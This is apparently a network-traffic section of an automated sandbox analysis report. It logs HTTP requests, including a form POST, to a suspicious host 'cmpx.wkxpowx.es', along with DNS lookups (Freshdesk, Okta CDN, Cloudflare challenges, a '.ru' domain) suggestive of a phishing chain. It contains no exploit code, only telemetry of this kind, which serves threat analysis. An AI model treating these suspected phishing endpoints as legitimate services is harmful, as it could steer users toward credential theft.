              Source: global trafficHTTP traffic detected: GET /klzbccjV1SmFBhGV9cByzcrYZ5zenfi53pkqL956170 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijOm9RWO013RdqRPhpzqySqtmrNfhRdyG7mn5TCTBmCwOplM5Rv7ef210 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opgLF9wAyZQBttvEuoD14qTO8Jk0znpamTRxQutCj4RuvyhjkGZfdZ1DMzo8mQvaWa62F6Ny1vWMkef233 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stCF2div2RQ92RDQ4FChT8dTJt1y4Glx2ZZsQQ8tAEL7wCmn2NLKaRgwYNKcP2K5pv3bM8LDFUucEukQEsef254 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klqlwHmS7lKqrxnlfVAWd5a4h2f4Au3G56DkTxaQxT1builqQgWxSgY0NDPBlt2wx220 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijNcjITk3MEf3S91tRTVvcjPupdQLjKrGqwzG7qrWFYMVCFJMBDb6keLbn4XQeGjDZAyz228 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijNcjITk3MEf3S91tRTVvcjPupdQLjKrGqwzG7qrWFYMVCFJMBDb6keLbn4XQeGjDZAyz228 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjltYS9SMDRod0FkYlQ0bTNvd0Y1bGc9PSIsInZhbHVlIjoiQlJ4NFRaRmdvYkN4bnNncGVObmFnclNDUWI3SXFwbmNqQVNvYkZaR0NQUHVVZk5IOURxRnFjWG1HeVF5SWd3dUJSLytETEdKQjYyRUJEZU12NThEQi92eDFlNFYweU4vTTlJV2k1S0FGZjN0SUdHQWJia2Z1UmFkYVZsRi85M3MiLCJtYWMiOiJjNjA2ZDhlNDMyZTU0ODdhNjAxMDAzMTU3ZDUyZWY1MTdlN2Y1MzMzZjE0ZDdiNjM4YWQxOGFiZTA0YzVlZjI0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitwWWl2dDlRbzByYk94REhxRUdhSmc9PSIsInZhbHVlIjoiZ01yOGhwS3FZLzlaNThQVDJYcmdYNUgzK3g3cm16aDJyRHNBUnF1S3I1d1JBUGFPVDh0VlBVNDdZM2tlUTBsR3JsVThBREFmd0FnZlEza2wzS0V1ZmxwMUtoN3N6WkpqdmFKMndyaHNNRVhOWFB4VDBNdlVxQ1RTSVlLSVJLbjkiLCJtYWMiOiIzNDBkYmE0OGUxMzM2OTBiYTAzOTJkNDE3ZTc0MGVkZTJiMzQ3MWMxMTI5MWE1MDllNjZjZmVmZmZhOGVhNzdiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klqlwHmS7lKqrxnlfVAWd5a4h2f4Au3G56DkTxaQxT1builqQgWxSgY0NDPBlt2wx220 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjltYS9SMDRod0FkYlQ0bTNvd0Y1bGc9PSIsInZhbHVlIjoiQlJ4NFRaRmdvYkN4bnNncGVObmFnclNDUWI3SXFwbmNqQVNvYkZaR0NQUHVVZk5IOURxRnFjWG1HeVF5SWd3dUJSLytETEdKQjYyRUJEZU12NThEQi92eDFlNFYweU4vTTlJV2k1S0FGZjN0SUdHQWJia2Z1UmFkYVZsRi85M3MiLCJtYWMiOiJjNjA2ZDhlNDMyZTU0ODdhNjAxMDAzMTU3ZDUyZWY1MTdlN2Y1MzMzZjE0ZDdiNjM4YWQxOGFiZTA0YzVlZjI0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitwWWl2dDlRbzByYk94REhxRUdhSmc9PSIsInZhbHVlIjoiZ01yOGhwS3FZLzlaNThQVDJYcmdYNUgzK3g3cm16aDJyRHNBUnF1S3I1d1JBUGFPVDh0VlBVNDdZM2tlUTBsR3JsVThBREFmd0FnZlEza2wzS0V1ZmxwMUtoN3N6WkpqdmFKMndyaHNNRVhOWFB4VDBNdlVxQ1RTSVlLSVJLbjkiLCJtYWMiOiIzNDBkYmE0OGUxMzM2OTBiYTAzOTJkNDE3ZTc0MGVkZTJiMzQ3MWMxMTI5MWE1MDllNjZjZmVmZmZhOGVhNzdiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /cvzdSo0pCDRNfU983q6ExVnCoJ4rBpDRih7WrwOkA7XgKsbaoTE86uM94g HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjltYS9SMDRod0FkYlQ0bTNvd0Y1bGc9PSIsInZhbHVlIjoiQlJ4NFRaRmdvYkN4bnNncGVObmFnclNDUWI3SXFwbmNqQVNvYkZaR0NQUHVVZk5IOURxRnFjWG1HeVF5SWd3dUJSLytETEdKQjYyRUJEZU12NThEQi92eDFlNFYweU4vTTlJV2k1S0FGZjN0SUdHQWJia2Z1UmFkYVZsRi85M3MiLCJtYWMiOiJjNjA2ZDhlNDMyZTU0ODdhNjAxMDAzMTU3ZDUyZWY1MTdlN2Y1MzMzZjE0ZDdiNjM4YWQxOGFiZTA0YzVlZjI0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitwWWl2dDlRbzByYk94REhxRUdhSmc9PSIsInZhbHVlIjoiZ01yOGhwS3FZLzlaNThQVDJYcmdYNUgzK3g3cm16aDJyRHNBUnF1S3I1d1JBUGFPVDh0VlBVNDdZM2tlUTBsR3JsVThBREFmd0FnZlEza2wzS0V1ZmxwMUtoN3N6WkpqdmFKMndyaHNNRVhOWFB4VDBNdlVxQ1RTSVlLSVJLbjkiLCJtYWMiOiIzNDBkYmE0OGUxMzM2OTBiYTAzOTJkNDE3ZTc0MGVkZTJiMzQ3MWMxMTI5MWE1MDllNjZjZmVmZmZhOGVhNzdiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxR5XdjT2i6phfQCt7Snjrv87gNS9cpVl6Q1kCACmnyFMUy5aJIPGsJPmJ90180 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjltYS9SMDRod0FkYlQ0bTNvd0Y1bGc9PSIsInZhbHVlIjoiQlJ4NFRaRmdvYkN4bnNncGVObmFnclNDUWI3SXFwbmNqQVNvYkZaR0NQUHVVZk5IOURxRnFjWG1HeVF5SWd3dUJSLytETEdKQjYyRUJEZU12NThEQi92eDFlNFYweU4vTTlJV2k1S0FGZjN0SUdHQWJia2Z1UmFkYVZsRi85M3MiLCJtYWMiOiJjNjA2ZDhlNDMyZTU0ODdhNjAxMDAzMTU3ZDUyZWY1MTdlN2Y1MzMzZjE0ZDdiNjM4YWQxOGFiZTA0YzVlZjI0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitwWWl2dDlRbzByYk94REhxRUdhSmc9PSIsInZhbHVlIjoiZ01yOGhwS3FZLzlaNThQVDJYcmdYNUgzK3g3cm16aDJyRHNBUnF1S3I1d1JBUGFPVDh0VlBVNDdZM2tlUTBsR3JsVThBREFmd0FnZlEza2wzS0V1ZmxwMUtoN3N6WkpqdmFKMndyaHNNRVhOWFB4VDBNdlVxQ1RTSVlLSVJLbjkiLCJtYWMiOiIzNDBkYmE0OGUxMzM2OTBiYTAzOTJkNDE3ZTc0MGVkZTJiMzQ3MWMxMTI5MWE1MDllNjZjZmVmZmZhOGVhNzdiIiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: enervit.freshdesk.com
              Source: global trafficDNS traffic detected: DNS query: s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: assets1.freshdesk.com
              Source: global trafficDNS traffic detected: DNS query: www.recaptcha.net
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: cmpx.wkxpowx.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: b2xigd.xqwqkd.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
              Source: unknownHTTP traffic detected: POST /ajefR11OzS32YGVsoSGIu9JI8R6D780tEiCha9UExsu HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveContent-Length: 805sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEdhptxdUHBJY6k1ksec-ch-ua-mobile: ?0Accept: */*Origin: https://cmpx.wkxpowx.esSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cmpx.wkxpowx.es/GUGXxy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imk1elJ2VWNzY3RBRkM4SEpQMmV1cnc9PSIsInZhbHVlIjoidWxKdno1Ym5lK3FHQ2IxeWt0UUdWRjQwWTFxbzAzM2NiZjV4K0YxZ3N4Z3N2TDZsajdhdGJJTXl1TWlvS1VDRmtCWU54QmVKdXBqU0RWVVJ1UFRTMXNIMEhDMllNUUVrTTYvSk9QNDJVZEhVQ1l5K0NnbzQ0YmNQUHNNbXBZc1giLCJtYWMiOiI4ZTQ1ODc4NzY4YWFjYTlhMWM0MTNjYmI5ZTU4YjAwM2VlZDk5NmQ4YTI1ODMxZTkyNWJlNjY3NmZhODkxMWI0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im0rSjc4eFppdlZSakloYUIwTGRKU1E9PSIsInZhbHVlIjoicEIrTVhrM2FiMmVTZVhlSzFaNUFTSTV6SFBjVDZUa20yR01SaDEvWjBjZzFtMGtScGhHeDIwRnFVU0syODRDVkpVbEd6R2paaU5YR2l4U0x0ZW5zTW1JMks1SzZaaHBpQ3RzVEIzcXNmRlJKUzBtL1I1MHF5NUkvbzJnV085RkYiLCJtYWMiOiJiOWI3M2NhZjk5YjJlNmJiZWE3ODQwOGZlZTBiMTI3M2E5OGNkZmU0NTUyZDRiYWM1MmIxZGZjMDA1ZGMzNTQ5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 11:34:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIRTnAzUOM8w9h5YUnEmjpTU2UnAFdbPMd0Lz0kEDQxHV1ACzqaFkBCxC4O63Y2BRH1XqgvyaqSwesbAaf6TNCV%2F4q6EiAbhwRz8orNu8yDlkN7thpN5%2BXckXC0V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=318&min_rtt=292&rtt_var=100&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2055&delivery_rate=12000000&cwnd=252&unsent_bytes=0&cid=3c374a3da7e428f1&ts=175&x=0"Server: cloudflareCF-RAY: 922ca9722c6430fa-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=690&min_rtt=688&rtt_var=262&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1717&delivery_rate=4096181&cwnd=231&unsent_bytes=0&cid=d36349342817d251&ts=448&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 11:34:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZp0CWHSbh6hO13KvBEx%2B%2FZP2GEAGFlrmH8R%2F4Wu5NYMauRmdoIN5MbRVyu4MtHk06K1EPAoNTec4SpiaI3lC85Kt4KNWs0bon7gw2aFeSBexJC2R0fw0tq%2Bdr%2F%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=16267&min_rtt=16237&rtt_var=4583&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2399&delivery_rate=248616&cwnd=253&unsent_bytes=0&cid=dc26203062dbd2e7&ts=4372&x=0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 80Server: cloudflareCF-RAY: 922ca9763a589abb-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=557&min_rtt=554&rtt_var=215&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1895&delivery_rate=4950427&cwnd=243&unsent_bytes=0&cid=b24494ab2e58e887&ts=39&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 11:34:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICVary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vSZa%2FWQQ1eaWfV2t9bSbKOb6D9XeVIS9X5%2BZI%2Bh4uUmgvR7sctbm%2BwjmTccolQZiOQVRgEa%2F%2BxzcS%2B21NV8Anh85GtDGfuV4tWjAwx4pMNw5rVnHpDz2vzT7F4rN"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server-Timing: cfL4;desc="?proto=TCP&rtt=314&min_rtt=281&rtt_var=98&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2054&delivery_rate=12637500&cwnd=252&unsent_bytes=0&cid=aa23c3e317da01be&ts=196&x=0"CF-RAY: 922ca978beb48fca-FRAalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 11:35:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICVary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAl3qy3y%2FzwU0YzgN%2BOSlt3MqSSrS2e9SjZINHtAI3COk3khfchsgceiDknjsxbhEN%2FbPNYfiiq%2Fh9TOuwNUw43CtgC7inoKOGdMHK9IBhxPtowgdoqBNIOjdWFL"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server-Timing: cfL4;desc="?proto=TCP&rtt=336&min_rtt=323&rtt_var=117&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2070&delivery_rate=9492957&cwnd=252&unsent_bytes=0&cid=9a8d66a31d91aa71&ts=176&x=0"CF-RAY: 922caa0e8ca0bbd9-FRAalt-svc: h3=":443"; ma=86400
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
